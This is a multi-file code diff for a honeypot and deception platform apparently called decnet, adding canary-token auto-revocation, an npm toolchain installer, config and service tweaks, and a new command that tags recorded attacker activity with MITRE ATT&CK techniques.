||||||
@@ -189,6 +339,22 @@ async def _record_hit(
|
|||||||
except Exception as e: # noqa: BLE001 — best effort
|
except Exception as e: # noqa: BLE001 — best effort
|
||||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||||
|
|
||||||
|
# Auto-deregister fingerprint canaries after the first valid fingerprint
|
||||||
|
# is collected. Slug goes dark; the stealth posture means the attacker
|
||||||
|
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
|
||||||
|
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
|
||||||
|
# http/dns canaries are NOT auto-revoked.
|
||||||
|
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
|
||||||
|
try:
|
||||||
|
await repo.update_canary_token_state(token["uuid"], "revoked")
|
||||||
|
await bus.publish(
|
||||||
|
topics.canary(token["uuid"], topics.CANARY_REVOKED),
|
||||||
|
{"token_id": token["uuid"], "trigger_id": trigger_id,
|
||||||
|
"reason": "fingerprint_collected"},
|
||||||
|
)
|
||||||
|
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
|
||||||
|
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------- DNS surface --------------------------------
|
# ---------------------------- DNS surface --------------------------------
|
||||||
|
|
||||||
@@ -214,7 +380,7 @@ async def _start_dns_server(
|
|||||||
local_addr=(_dns_bind(), _dns_port()),
|
local_addr=(_dns_bind(), _dns_port()),
|
||||||
)
|
)
|
||||||
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
||||||
return transport # type: ignore[return-value]
|
return transport
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------- entry point --------------------------------
|
# ---------------------------- entry point --------------------------------
|
||||||
|
|||||||
@@ -39,6 +39,7 @@ from . import (
|
|||||||
swarm,
|
swarm,
|
||||||
swarmctl,
|
swarmctl,
|
||||||
topology,
|
topology,
|
||||||
|
ttp,
|
||||||
updater,
|
updater,
|
||||||
web,
|
web,
|
||||||
webhook,
|
webhook,
|
||||||
@@ -59,7 +60,7 @@ for _mod in (
|
|||||||
swarm,
|
swarm,
|
||||||
deploy, lifecycle, workers, inventory,
|
deploy, lifecycle, workers, inventory,
|
||||||
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
||||||
topology, bus, geoip, init, webhook, canary,
|
topology, bus, geoip, init, webhook, canary, ttp,
|
||||||
):
|
):
|
||||||
_mod.register(app)
|
_mod.register(app)
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,13 @@
|
|||||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||||
|
|
||||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
Two entry points share this module:
|
||||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
|
||||||
:func:`decnet.canary.worker.run`.
|
* ``decnet canary`` — runs the worker process. Mirrors the shape of
|
||||||
|
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
|
||||||
|
systemd unit so its argv must stay stable.
|
||||||
|
* ``decnet canary-install-toolchain`` — provisions the Node side of
|
||||||
|
the fingerprint-canary obfuscator. Idempotent; safe to call from
|
||||||
|
the API service unit's ``ExecStartPre``.
|
||||||
|
|
||||||
Not master-only — any host that hosts deckies can run its own
|
Not master-only — any host that hosts deckies can run its own
|
||||||
canary worker (the bus events stay local; the webhook worker on
|
canary worker (the bus events stay local; the webhook worker on
|
||||||
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import shutil
|
||||||
|
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
import typer
|
import typer
|
||||||
|
|
||||||
from . import utils as _utils
|
from . import utils as _utils
|
||||||
from .utils import console, log
|
from .utils import console, log
|
||||||
|
|
||||||
|
_TOOLCHAIN_TIMEOUT_S = 180
|
||||||
|
|
||||||
|
|
||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command(name="canary")
|
@app.command(name="canary")
|
||||||
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
|
|||||||
asyncio.run(run())
|
asyncio.run(run())
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="canary-install-toolchain")
|
||||||
|
def canary_install_toolchain(
|
||||||
|
npm_bin: str = typer.Option(
|
||||||
|
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
|
||||||
|
),
|
||||||
|
) -> None:
|
||||||
|
"""Install the Node-side toolchain used by fingerprint canaries.
|
||||||
|
|
||||||
|
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
|
||||||
|
directory so the obfuscator's helper script can ``require()``
|
||||||
|
``javascript-obfuscator`` at mint time. Requires Node >= 18.
|
||||||
|
|
||||||
|
Idempotent: re-running on an already-installed tree is fast
|
||||||
|
(npm short-circuits when ``node_modules/`` is up-to-date).
|
||||||
|
"""
|
||||||
|
import decnet.canary as _canary_pkg
|
||||||
|
canary_dir = Path(_canary_pkg.__file__).resolve().parent
|
||||||
|
if not (canary_dir / "package.json").is_file():
|
||||||
|
console.print(
|
||||||
|
f"[red]canary package.json not found under {canary_dir}; "
|
||||||
|
"wheel may be missing the JS toolchain payload.[/]"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=2)
|
||||||
|
if shutil.which(npm_bin) is None:
|
||||||
|
console.print(
|
||||||
|
f"[red]npm executable {npm_bin!r} not found on PATH. "
|
||||||
|
"Install Node >= 18 and re-run.[/]"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=2)
|
||||||
|
console.print(
|
||||||
|
f"[cyan]installing canary toolchain[/] in {canary_dir}",
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
|
||||||
|
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
|
||||||
|
cwd=str(canary_dir),
|
||||||
|
capture_output=True, text=True,
|
||||||
|
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
|
||||||
|
)
|
||||||
|
except subprocess.TimeoutExpired:
|
||||||
|
console.print("[red]npm install timed out after 3 minutes[/]")
|
||||||
|
raise typer.Exit(code=3) from None
|
||||||
|
if proc.returncode != 0:
|
||||||
|
console.print(
|
||||||
|
f"[red]npm install failed rc={proc.returncode}[/]\n"
|
||||||
|
f"{proc.stderr.strip()}"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=proc.returncode)
|
||||||
|
console.print("[green]canary toolchain ready[/]")
|
||||||
|
|||||||
@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
|
|||||||
"mutate", "listener", "profiler",
|
"mutate", "listener", "profiler",
|
||||||
"services", "distros", "correlate", "archetypes", "web",
|
"services", "distros", "correlate", "archetypes", "web",
|
||||||
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
||||||
|
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
|
||||||
|
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
|
||||||
|
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
|
||||||
|
"ttp-backfill",
|
||||||
})
|
})
|
||||||
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
||||||
{"swarm", "topology", "geoip", "realism"}
|
{"swarm", "topology", "geoip", "realism"}
|
||||||
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
|
|||||||
return
|
return
|
||||||
_app.registered_commands = [
|
_app.registered_commands = [
|
||||||
c for c in _app.registered_commands
|
c for c in _app.registered_commands
|
||||||
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
|
if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
|
||||||
]
|
]
|
||||||
_app.registered_groups = [
|
_app.registered_groups = [
|
||||||
g for g in _app.registered_groups
|
g for g in _app.registered_groups
|
||||||
|
|||||||
@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
|
|||||||
# EnvironmentFile= — never in a group-readable INI.
|
# EnvironmentFile= — never in a group-readable INI.
|
||||||
|
|
||||||
[decnet]
|
[decnet]
|
||||||
|
# DECNET-service user/group as configured at `decnet init` time.
|
||||||
|
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
|
||||||
|
# so the same user name can have different numeric uids on master vs
|
||||||
|
# agents without breaking artifact ownership.
|
||||||
|
api-user = {api_user}
|
||||||
|
api-group = {api_group}
|
||||||
# mode = master # or "agent"
|
# mode = master # or "agent"
|
||||||
|
|
||||||
# [api]
|
# [api]
|
||||||
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
|
|||||||
# master-host = 10.0.0.1
|
# master-host = 10.0.0.1
|
||||||
# syslog-port = 6514
|
# syslog-port = 6514
|
||||||
# swarmctl-port = 8770
|
# swarmctl-port = 8770
|
||||||
|
# swarmctl-host = 127.0.0.1
|
||||||
|
|
||||||
# [logging]
|
# [logging]
|
||||||
# system-log = /var/log/decnet/decnet.system.log
|
# system-log = /var/log/decnet/decnet.system.log
|
||||||
@@ -197,14 +204,17 @@ def _ensure_dir(
|
|||||||
return f"skip: {path} already present" if existed else "ok"
|
return f"skip: {path} already present" if existed else "ok"
|
||||||
|
|
||||||
|
|
||||||
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
|
def _ensure_config(
|
||||||
|
path: Path, group: str, *, user: str, dry_run: bool,
|
||||||
|
) -> str:
|
||||||
if path.exists():
|
if path.exists():
|
||||||
return f"skip: {path} already present"
|
return f"skip: {path} already present"
|
||||||
if dry_run:
|
if dry_run:
|
||||||
console.print(f" [dim]would write:[/] {path}")
|
console.print(f" [dim]would write:[/] {path}")
|
||||||
return "ok"
|
return "ok"
|
||||||
path.parent.mkdir(parents=True, exist_ok=True)
|
path.parent.mkdir(parents=True, exist_ok=True)
|
||||||
path.write_text(_CONFIG_PLACEHOLDER)
|
rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
|
||||||
|
path.write_text(rendered)
|
||||||
try:
|
try:
|
||||||
os.chmod(path, 0o640)
|
os.chmod(path, 0o640)
|
||||||
gid = grp.getgrnam(group).gr_gid
|
gid = grp.getgrnam(group).gr_gid
|
||||||
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
||||||
_install_rel = install_dir.lstrip("/")
|
_install_rel = install_dir.lstrip("/")
|
||||||
|
|
||||||
required_tools = ("systemctl",) if deinit else (
|
required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
|
||||||
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
||||||
)
|
)
|
||||||
if deinit:
|
if deinit:
|
||||||
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
"systemctl daemon-reload",
|
"systemctl daemon-reload",
|
||||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
f"remove {etc_decnet / 'decnet.ini'}",
|
f"remove {etc_decnet / 'decnet.ini'}",
|
||||||
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
|
|||||||
(pfx / _install_rel, 0o755, user, group),
|
(pfx / _install_rel, 0o755, user, group),
|
||||||
(pfx / "var/lib/decnet", 0o750, user, group),
|
(pfx / "var/lib/decnet", 0o750, user, group),
|
||||||
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
||||||
|
# DEBT-035 / DEBT-047: artifact root carries setgid (the
|
||||||
|
# 0o2... bit) so every file written under it inherits the
|
||||||
|
# decnet group regardless of which container's uid created
|
||||||
|
# it. Group-write (0o2775) lets the API process and the
|
||||||
|
# local TTP worker read each other's outputs without a
|
||||||
|
# manual chown after every fresh deploy.
|
||||||
|
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
|
||||||
(pfx / "var/log/decnet", 0o750, user, group),
|
(pfx / "var/log/decnet", 0o750, user, group),
|
||||||
(etc_decnet, 0o755, "root", group),
|
(etc_decnet, 0o755, "root", group),
|
||||||
(pfx / "run/decnet", 0o755, "root", group),
|
(pfx / "run/decnet", 0o755, "root", group),
|
||||||
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
|
|||||||
for path, mode, d_owner, d_group in dirs:
|
for path, mode, d_owner, d_group in dirs:
|
||||||
_step(
|
_step(
|
||||||
f"ensure dir {path}",
|
f"ensure dir {path}",
|
||||||
lambda p=path, m=mode, o=d_owner, g=d_group:
|
lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
|
||||||
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
f"write {etc_decnet / 'decnet.ini'}",
|
f"write {etc_decnet / 'decnet.ini'}",
|
||||||
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
|
lambda: _ensure_config(
|
||||||
|
etc_decnet / "decnet.ini", group,
|
||||||
|
user=user, dry_run=dry_run,
|
||||||
|
),
|
||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
"install systemd units",
|
"install systemd units",
|
||||||
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
"systemctl daemon-reload",
|
"systemctl daemon-reload",
|
||||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||||
)
|
)
|
||||||
|
|
||||||
if no_start:
|
if no_start:
|
||||||
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
_step(
|
_step(
|
||||||
"systemctl enable --now decnet.target",
|
"systemctl enable --now decnet.target",
|
||||||
lambda: (
|
lambda: (
|
||||||
_run(
|
_run( # type: ignore[func-returns-value]
|
||||||
["systemctl", "enable", "--now", "decnet.target"],
|
["systemctl", "enable", "--now", "decnet.target"],
|
||||||
dry_run=dry_run,
|
dry_run=dry_run,
|
||||||
),
|
),
|
||||||
|
|||||||
@@ -16,8 +16,16 @@ from .utils import console, log
|
|||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command()
|
@app.command()
|
||||||
def swarmctl(
|
def swarmctl(
|
||||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
port: int = typer.Option(
|
||||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
8770, "--port",
|
||||||
|
envvar="DECNET_SWARMCTL_PORT",
|
||||||
|
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
|
||||||
|
),
|
||||||
|
host: str = typer.Option(
|
||||||
|
"127.0.0.1", "--host",
|
||||||
|
envvar="DECNET_SWARMCTL_HOST",
|
||||||
|
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
|
||||||
|
),
|
||||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||||
|
|||||||
@@ -233,8 +233,8 @@ def _delete(
|
|||||||
topo = await repo.get_topology(topology_id)
|
topo = await repo.get_topology(topology_id)
|
||||||
if topo is None:
|
if topo is None:
|
||||||
return False, "not-found"
|
return False, "not-found"
|
||||||
if topo["status"] in _RUNNING:
|
if topo.status in _RUNNING:
|
||||||
return False, str(topo["status"])
|
return False, str(topo.status)
|
||||||
ok = await repo.delete_topology_cascade(topology_id)
|
ok = await repo.delete_topology_cascade(topology_id)
|
||||||
return ok, None
|
return ok, None
|
||||||
|
|
||||||
|
|||||||
309
decnet/cli/ttp.py
Normal file
309
decnet/cli/ttp.py
Normal file
@@ -0,0 +1,309 @@
|
|||||||
|
"""``decnet ttp`` — TTP-tagging worker and admin commands.
|
||||||
|
|
||||||
|
Two flat commands share this module:
|
||||||
|
|
||||||
|
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
|
||||||
|
``attacker.session.ended`` / ``attacker.observed`` /
|
||||||
|
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
|
||||||
|
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
|
||||||
|
dispatches each event through :class:`CompositeTagger` (RuleEngine +
|
||||||
|
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
|
||||||
|
lifters), persists ``ttp_tag`` rows via the idempotent
|
||||||
|
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
|
||||||
|
``ttp.rule.fired.<technique_id>`` only when the insert returned a
|
||||||
|
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
|
||||||
|
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
|
||||||
|
so its argv must stay stable.
|
||||||
|
|
||||||
|
* ``decnet ttp-backfill`` — replays historical events (shell commands
|
||||||
|
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
|
||||||
|
through the live tagger. Writes ``ttp_tag`` rows using the same
|
||||||
|
idempotent insert path. **Does not publish** to the bus — replay must
|
||||||
|
not re-trigger SIEM/webhook fan-out on already-attributed events.
|
||||||
|
|
||||||
|
Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
|
||||||
|
:mod:`decnet.cli.gating`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import time
|
||||||
|
from datetime import datetime, timedelta, timezone
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
import typer
|
||||||
|
|
||||||
|
from decnet.ttp.factory import CompositeTagger, get_tagger
|
||||||
|
|
||||||
|
from . import utils as _utils
|
||||||
|
from .utils import console, log
|
||||||
|
|
||||||
|
|
||||||
|
_BACKFILL_SOURCES = ("command", "canary", "all")
|
||||||
|
|
||||||
|
|
||||||
|
def register(app: typer.Typer) -> None:
|
||||||
|
@app.command(name="ttp")
|
||||||
|
def ttp(
|
||||||
|
poll_interval_secs: float = typer.Option(
|
||||||
|
60.0, "--poll-interval", "-i",
|
||||||
|
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||||
|
),
|
||||||
|
daemon: bool = typer.Option(
|
||||||
|
False, "--daemon", "-d",
|
||||||
|
help="Detach to background as a daemon process",
|
||||||
|
),
|
||||||
|
) -> None:
|
||||||
|
"""TTP-tagging worker — MITRE ATT&CK technique tagging."""
|
||||||
|
from decnet.ttp.worker import run_ttp_worker_loop
|
||||||
|
from decnet.web.dependencies import repo
|
||||||
|
|
||||||
|
if daemon:
|
||||||
|
log.info("ttp daemonizing poll=%s", poll_interval_secs)
|
||||||
|
_utils._daemonize()
|
||||||
|
|
||||||
|
log.info("ttp command invoked poll=%s", poll_interval_secs)
|
||||||
|
console.print(
|
||||||
|
f"[bold cyan]TTP tagging worker starting[/] "
|
||||||
|
f"poll={poll_interval_secs}s"
|
||||||
|
)
|
||||||
|
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||||
|
|
||||||
|
async def _run() -> None:
|
||||||
|
await repo.initialize()
|
||||||
|
await run_ttp_worker_loop(
|
||||||
|
repo, poll_interval_secs=poll_interval_secs,
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
asyncio.run(_run())
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
console.print("\n[yellow]TTP tagging worker stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="ttp-backfill")
|
||||||
|
def ttp_backfill(
|
||||||
|
since_days: int = typer.Option(
|
||||||
|
7, "--since-days", "-s",
|
||||||
|
min=1, max=3650,
|
||||||
|
help="Replay events whose source row is newer than N days ago.",
|
||||||
|
),
|
||||||
|
source: str = typer.Option(
|
||||||
|
"all", "--source",
|
||||||
|
help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
|
||||||
|
),
|
||||||
|
dry_run: bool = typer.Option(
|
||||||
|
False, "--dry-run",
|
||||||
|
help="Run the tagger but skip insert_tags. Reports counts only.",
|
||||||
|
),
|
||||||
|
batch_size: int = typer.Option(
|
||||||
|
500, "--batch-size",
|
||||||
|
min=1, max=100_000,
|
||||||
|
help="Number of tags accumulated before each repo.insert_tags call.",
|
||||||
|
),
|
||||||
|
) -> None:
|
||||||
|
"""Replay historical attacker activity through the live tagger.
|
||||||
|
|
||||||
|
Walks ``Attacker.commands`` (per-IP shell-command history) and
|
||||||
|
``CanaryTrigger`` (canary callback log) since N days ago,
|
||||||
|
builds the same :class:`TaggerEvent` shape the live worker
|
||||||
|
emits, and persists tags via the idempotent INSERT OR IGNORE
|
||||||
|
write. Re-running is safe — a second pass over identical
|
||||||
|
source rows reports ``inserted=0``.
|
||||||
|
|
||||||
|
Bus publish is intentionally suppressed; SIEM / webhook fan-out
|
||||||
|
sees only live events, never replays.
|
||||||
|
"""
|
||||||
|
from decnet.cli.gating import _require_master_mode
|
||||||
|
from decnet.web.dependencies import repo
|
||||||
|
|
||||||
|
_require_master_mode("ttp-backfill")
|
||||||
|
|
||||||
|
if source not in _BACKFILL_SOURCES:
|
||||||
|
console.print(
|
||||||
|
f"[red]invalid --source {source!r}; expected one of "
|
||||||
|
f"{_BACKFILL_SOURCES}[/]"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=2)
|
||||||
|
|
||||||
|
cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
|
||||||
|
console.print(
|
||||||
|
f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
|
||||||
|
f"source={source} dry_run={dry_run} batch_size={batch_size}"
|
||||||
|
)
|
||||||
|
|
||||||
|
async def _run() -> None:
|
||||||
|
await repo.initialize()
|
||||||
|
await _backfill(
|
||||||
|
repo,
|
||||||
|
cutoff=cutoff,
|
||||||
|
sources=_resolve_sources(source),
|
||||||
|
dry_run=dry_run,
|
||||||
|
batch_size=batch_size,
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
asyncio.run(_run())
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
console.print("\n[yellow]Backfill interrupted.[/]")
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_sources(name: str) -> tuple[str, ...]:
|
||||||
|
if name == "all":
|
||||||
|
return ("command", "canary")
|
||||||
|
return (name,)
|
||||||
|
|
||||||
|
|
||||||
|
async def _backfill(
|
||||||
|
repo: Any,
|
||||||
|
*,
|
||||||
|
cutoff: datetime,
|
||||||
|
sources: tuple[str, ...],
|
||||||
|
dry_run: bool,
|
||||||
|
batch_size: int,
|
||||||
|
) -> None:
|
||||||
|
"""Drive the per-source backfill loops and report structured counts.
|
||||||
|
|
||||||
|
One :class:`CompositeTagger` is built once and reused for every
|
||||||
|
source — the per-lifter watch fan-out the live worker performs is
|
||||||
|
inlined here as a `watch_store()` startup task per
|
||||||
|
:class:`WatchableTagger`, so the dispatch indexes hydrate before
|
||||||
|
we start feeding events.
|
||||||
|
"""
|
||||||
|
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
|
||||||
|
# to inject a recording fake without touching the global factory.
|
||||||
|
tagger = get_tagger()
|
||||||
|
watch_tasks: list[asyncio.Task[None]] = []
|
||||||
|
if isinstance(tagger, CompositeTagger):
|
||||||
|
for watchable in tagger.iter_watchables():
|
||||||
|
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
|
||||||
|
# Yield once so each watch_store gets a chance to run its
|
||||||
|
# initial `load_compiled` before we feed the first event.
|
||||||
|
await asyncio.sleep(0.05)
|
||||||
|
|
||||||
|
try:
|
||||||
|
if "command" in sources:
|
||||||
|
await _backfill_commands(
|
||||||
|
repo, tagger, cutoff=cutoff,
|
||||||
|
dry_run=dry_run, batch_size=batch_size,
|
||||||
|
)
|
||||||
|
if "canary" in sources:
|
||||||
|
await _backfill_canaries(
|
||||||
|
repo, tagger, cutoff=cutoff,
|
||||||
|
dry_run=dry_run, batch_size=batch_size,
|
||||||
|
)
|
||||||
|
finally:
|
||||||
|
for task in watch_tasks:
|
||||||
|
task.cancel()
|
||||||
|
for task in watch_tasks:
|
||||||
|
try:
|
||||||
|
await task
|
||||||
|
except (asyncio.CancelledError, Exception): # noqa: BLE001
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
async def _backfill_commands(
|
||||||
|
repo: Any,
|
||||||
|
tagger: Any,
|
||||||
|
*,
|
||||||
|
cutoff: datetime,
|
||||||
|
dry_run: bool,
|
||||||
|
batch_size: int,
|
||||||
|
) -> None:
|
||||||
|
from decnet.ttp.base import TaggerEvent
|
||||||
|
|
||||||
|
started = time.monotonic()
|
||||||
|
rows_seen = 0
|
||||||
|
cmds_seen = 0
|
||||||
|
inserted = 0
|
||||||
|
pending: list[Any] = []
|
||||||
|
|
||||||
|
async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
|
||||||
|
rows_seen += 1
|
||||||
|
for idx, cmd in enumerate(commands):
|
||||||
|
cmds_seen += 1
|
||||||
|
text = cmd.get("command_text") or cmd.get("text")
|
||||||
|
if not isinstance(text, str):
|
||||||
|
continue
|
||||||
|
cmd_id = (
|
||||||
|
cmd.get("id")
|
||||||
|
or cmd.get("uuid")
|
||||||
|
or cmd.get("command_id")
|
||||||
|
or f"{attacker.uuid}#cmd{idx}"
|
||||||
|
)
|
||||||
|
event = TaggerEvent(
|
||||||
|
source_kind="command",
|
||||||
|
source_id=str(cmd_id),
|
||||||
|
attacker_uuid=attacker.uuid,
|
||||||
|
identity_uuid=getattr(attacker, "identity_id", None),
|
||||||
|
session_id=cmd.get("session_id"),
|
||||||
|
decky_id=cmd.get("decky_id") or cmd.get("decky"),
|
||||||
|
payload={**cmd, "command_text": text},
|
||||||
|
)
|
||||||
|
tags = await tagger.tag(event)
|
||||||
|
if tags:
|
||||||
|
pending.extend(tags)
|
||||||
|
if len(pending) >= batch_size:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
pending = []
|
||||||
|
if pending:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
elapsed = time.monotonic() - started
|
||||||
|
console.print(
|
||||||
|
f"source=command rows={rows_seen} commands={cmds_seen} "
|
||||||
|
f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _backfill_canaries(
|
||||||
|
repo: Any,
|
||||||
|
tagger: Any,
|
||||||
|
*,
|
||||||
|
cutoff: datetime,
|
||||||
|
dry_run: bool,
|
||||||
|
batch_size: int,
|
||||||
|
) -> None:
|
||||||
|
from decnet.ttp.base import TaggerEvent
|
||||||
|
|
||||||
|
started = time.monotonic()
|
||||||
|
rows_seen = 0
|
||||||
|
inserted = 0
|
||||||
|
pending: list[Any] = []
|
||||||
|
|
||||||
|
async for trigger in repo.iter_canary_triggers_since(cutoff):
|
||||||
|
rows_seen += 1
|
||||||
|
event = TaggerEvent(
|
||||||
|
source_kind="canary_fingerprint",
|
||||||
|
source_id=trigger.uuid,
|
||||||
|
attacker_uuid=trigger.attacker_id,
|
||||||
|
identity_uuid=None,
|
||||||
|
session_id=None,
|
||||||
|
decky_id=None,
|
||||||
|
payload={
|
||||||
|
"token_uuid": trigger.token_uuid,
|
||||||
|
"src_ip": trigger.src_ip,
|
||||||
|
"ua_signature": trigger.user_agent or "",
|
||||||
|
"user_agent": trigger.user_agent,
|
||||||
|
"request_path": trigger.request_path,
|
||||||
|
"dns_qname": trigger.dns_qname,
|
||||||
|
"headers": trigger.headers(),
|
||||||
|
},
|
||||||
|
)
|
||||||
|
tags = await tagger.tag(event)
|
||||||
|
if tags:
|
||||||
|
pending.extend(tags)
|
||||||
|
if len(pending) >= batch_size:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
pending = []
|
||||||
|
if pending:
|
||||||
|
